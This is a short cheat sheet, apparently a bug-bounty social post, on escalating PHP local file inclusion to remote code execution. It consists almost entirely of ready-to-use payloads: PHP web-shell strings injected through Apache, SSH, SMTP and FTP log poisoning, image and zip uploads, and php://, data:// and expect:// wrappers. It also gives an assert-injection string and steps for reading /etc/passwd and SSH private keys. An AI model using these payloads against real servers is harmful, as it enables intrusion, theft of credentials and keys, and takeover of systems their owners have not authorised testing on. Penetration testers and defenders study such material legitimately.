Security Notes | Integer Cyber Security: Local File Inclusion to Remote Code Execution Cheatsheet

LFI থেকে RCE তে কনভার্ট করার গুরুত্বপূর্ণ চিটশীট

(1)

Apache Log Poisoning

GET /show.php?file=/var/log/apache2/access.log&c=ls HTTP/1.1

User-Agent: <?php system($_GET['c'])?>

.

(2)

SSH Log Poisoning

ssh '<?php system($_GET['c'])?>'@target.com

/show.php?file=/var/log/auth.log&c=ls

.

(3)

SMTP Log Poisoning

telnet target(.)com 25

MAIL FROM:<tuhinbose70@gmail.com>

RCPT TO:<?php system($_GET['c'])?>

/show.php?file=/var/log/mail.log&c=ls

.

(4)

Image Upload

i. Add this to EXIF data of s.png: <?php system($_GET['c'])?>

ii. Upload the s.png.

iii. /show.php?file=../img/s.png&c=ls

.

(5)

/proc/self/environ

GET /show.php?file=../../proc/self/environ&c=ls HTTP/1.1

User-Agent: <?php system($_GET['c'])?>

If no success then try writing files.

.

(6)

php://filter

Read source code, it may contain sensitive data (username/passwords, private keys etc)->RCE

php://filter/convert.base64-encode/resource=index.php

php://filter/read=string.rot13/resource=index.php

"php://filter" is case insensitive. Try URL/Double encoding

.

(7)

Zip Upload

echo "<?php system($_GET['c'])?>" > shell.php

zip shell(.)zip shell.php

mv shell(.)zip shell.jpg

rm shell.php

/show.php?file=zip://shell.jpg%23shell.php

.

(8)

data://text/plain:

/show.php?file=data://text/plain,<?php echo base64_encode(file_get_contents("index.php"))?>

/show.php?file=data://text/plain,<?php phpinfo()?>

/show.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pO2VjaG8gJ3NoZWxsISc7Pz4=

.

(9)

/proc/self/fd/{id}

Include shell in headers (User-Agent, Authorisation, Referrer etc) and access /proc/self/fd/{id}

.

(10)

/proc/$PID/fd/$FD

i. Upload a lot of shells.

ii. /show.php?file=/proc/$PID/fd/$FD

.

(11)

expect://

/show.php?page=expect://ls

.

(12)

input://

POST /index.php?page=php://input HTTP/1.1

<?php system('ls')?>

.

(13)

RCE via vulnerable assert statement

Vulnerable Code: assert("strpos('$file', '..') === false") or die("Hacker!");

Payload: ' and die(system("whoami")) or '

.

(14)

Log files:

/var/log/apache/{access.log or error.log}

/var/log/apache2/error.log

/usr/local/{apache or apache2}/log/error_log

/var/log/nginx/{access.log or error.log}

/var/log/httpd/error_log

Insert payload via headers (User-Agent, Authorisation, Referrer etc)

.

(15)

Via PHP sessions: from-lfi-to-rce-via-php-sessions

.

(16)

via SSH:

If ssh is active check which user is being used (/proc/self/status & /etc/passwd) and try to access <HOME>/.ssh/id_rsa

.

(17)

vsftpd Log Poisoning:

Try to login (ftp) with the PHP payload in the username and access /var/log/vsftpd.log

.

To automate, use LFISuite.

#bugbounty #bugbountytips #bugbountytip #infosec #informationsecurity #hacking #fr0z3n_f14m3 #webpentesting #cybersecurity #LFI #RCE